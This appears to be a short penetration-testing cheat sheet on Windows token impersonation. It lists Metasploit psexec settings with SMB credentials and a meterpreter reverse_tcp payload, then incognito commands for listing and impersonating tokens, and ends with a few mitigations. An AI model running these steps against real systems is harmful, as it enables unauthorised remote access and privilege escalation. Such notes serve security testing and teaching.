Token Impersonation using Incognito
Fire up metasploit
Use
exploit/windows/smb/psexec
Set the following options
Set rhosts
Set smbdomain
Set smbpass
Set smbuser
Set target 2
Set payload windows/x64/meterpreter/reverse_tcp
If you get a meterpreter session as a result then do the following:
load incognito
list_tokens -u
Select the token you want to impersonate using
impersonate_token
Useful commands:
rev2self
getuid
Mitigation Strategies
Limit user / group token creation permissions
Account tiering
Local Admin restriction
Last updated